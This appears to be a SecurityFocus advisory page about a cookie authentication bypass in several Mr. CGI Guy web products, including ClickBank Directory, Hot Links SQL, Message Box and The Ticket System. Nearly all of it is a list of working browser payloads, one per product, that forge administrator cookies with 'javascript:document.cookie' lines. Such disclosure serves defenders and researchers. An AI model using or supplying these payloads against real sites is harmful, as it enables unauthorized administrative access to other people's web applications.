Multiple Mr. CGI Guy Products Cookie Authentication Bypass Vulnerability

Attackers can exploit this issue via a browser.

The following examples are available:

For ClickBank Directory:
javascript:document.cookie="clickbank=Logged+In;path=/";

For Hot Links SQL and Hot Links SQL-PHP:
javascript:document.cookie="admin=logged%20in;path=/";

For Amazon Directory:
javascript:document.cookie="amazonadmin=logged%20in;path=/";

For Message Box:
javascript:document.cookie="mbadmin=logged%20in;path=/";

For The Ticket System and The Ticket System PHP:
javascript:document.cookie="ttc_admin=1%7Cadmin;path=/";

For Ultimate Profit Portal:
javascript:document.cookie="uppadmin=logged%20in;path=/";

For SimpLISTic SQL:
javascript:document.cookie="amazonadmin=logged in;path=/";

For Top Sites:
javascript:document.cookie="clickbank=Logged+In;path=/";


 

Privacy Statement
Copyright 2010, SecurityFocus